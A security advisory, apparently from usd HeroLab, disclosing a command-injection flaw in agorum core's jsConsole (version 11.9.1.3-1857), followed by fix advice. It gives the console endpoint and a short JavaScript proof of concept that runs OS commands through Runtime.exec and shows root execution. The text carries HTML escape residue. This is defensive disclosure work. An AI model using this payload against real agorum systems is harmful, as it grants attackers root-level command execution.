Affected Version<\/strong>: 11.9.1.3-1857
Vulnerability Type<\/strong>: Improper Neutralization of Special Elements used in a Command (Command Injection) (CWE-77)
Security Risk<\/strong>: Critical
Vendor<\/strong>: Agorum
Vendor URL<\/strong>: https:\/\/www.agorum.com\/<\/a>
Vendor acknowledged vulnerability<\/strong>: No
Vendor Status<\/strong>: Not fixed
CVE Number<\/strong>: Not requested
CVE Link<\/strong>: Not requested
Advisory ID<\/strong>: usd-2025-0021<\/p>\n
Description<\/h3>\n
\u200bagorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n
Proof of Concept<\/h3>\n
An administrative user can make use of a module called jsConsole<\/strong>, which allows the execution of arbitrary commands at the operating system level.<\/p>\n The jsConsole<\/strong> is accessible through the following endpoint. \/roiwebui\/home_module\/container\/?parent=root&id=root.0&module=Home&brick=ScriptEditor&config={isAdmin%3Atrue%2CisConsoleOnly%3Atrue}<\/strong><\/p>\n The following payload can be used within the console to execute the whoami<\/strong> command.<\/p>\n The following screenshot shows the command execution, revealing that the service is running as the root<\/strong> user, which grants full control over the system to an attacker.<\/p>\n Additionally, a whitelist approach should be implemented, permitting only specific and necessary commands to be executed. Allowing arbitrary command execution should be avoided entirely.<\/p>\n It is also crucial to configure the service to run with the least privileges possible. Instead of operating as the root user, the service should run under a dedicated low-privileged account, which significantly reduces the potential impact of any successful exploitation.<\/p>\n If jsConsole<\/strong> is not absolutely required, the functionality should either be disabled or access should be heavily restricted.<\/p>\n<\/span>var<\/span> <\/span>runCommand<\/span> <\/span>=<\/span> <\/span>function<\/span>(<\/span>cmd<\/span>)<\/span> <\/span>{
<\/span> <\/span>var<\/span> <\/span>runtime<\/span> <\/span>=<\/span> <\/span>java<\/span>.<\/span>lang<\/span>.<\/span>Runtime<\/span>.<\/span>getRuntime<\/span>();
<\/span> <\/span>var<\/span> <\/span>process<\/span> <\/span>=<\/span> <\/span>runtime<\/span>.<\/span>exec<\/span>(<\/span>cmd<\/span>);
<\/span> <\/span>var<\/span> <\/span>reader<\/span> <\/span>=<\/span> <\/span>new<\/span> <\/span>java<\/span>.<\/span>io<\/span>.<\/span>BufferedReader<\/span>(
<\/span> <\/span>new<\/span> <\/span>java<\/span>.<\/span>io<\/span>.<\/span>InputStreamReader<\/span>(<\/span>process<\/span>.<\/span>getInputStream<\/span>())
<\/span> <\/span>);
<\/span> <\/span>var<\/span> <\/span>line<\/span>;
<\/span> <\/span>var<\/span> <\/span>output<\/span> <\/span>=<\/span> <\/span>\"\"<\/span>;
<\/span> <\/span>while<\/span> <\/span>((<\/span>line<\/span> <\/span>=<\/span> <\/span>reader<\/span>.<\/span>readLine<\/span>())<\/span> <\/span>!=<\/span> <\/span>null<\/span>)<\/span> <\/span>{
<\/span> <\/span>output<\/span> <\/span>+=<\/span> <\/span>line<\/span> <\/span>+<\/span> <\/span>\"\\n\"<\/span>;
<\/span> <\/span>}
<\/span> <\/span>reader<\/span>.<\/span>close<\/span>();
<\/span> <\/span>process<\/span>.<\/span>waitFor<\/span>();
<\/span> <\/span>return<\/span> <\/span>output<\/span>;
<\/span>};
<\/span>runCommand<\/span>(<\/span>\"whoami\"<\/span>);<\/span><\/pre>\n<\/div>\n![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/rce.png\")
<\/p>\nFix<\/h3>\n
First, all user inputs within jsConsole<\/strong> must be strictly validated and sanitized. Only a predefined set of safe commands should be allowed, and any inputs containing potentially dangerous characters must be rejected or properly escaped.<\/p>\nReferences<\/h3>\n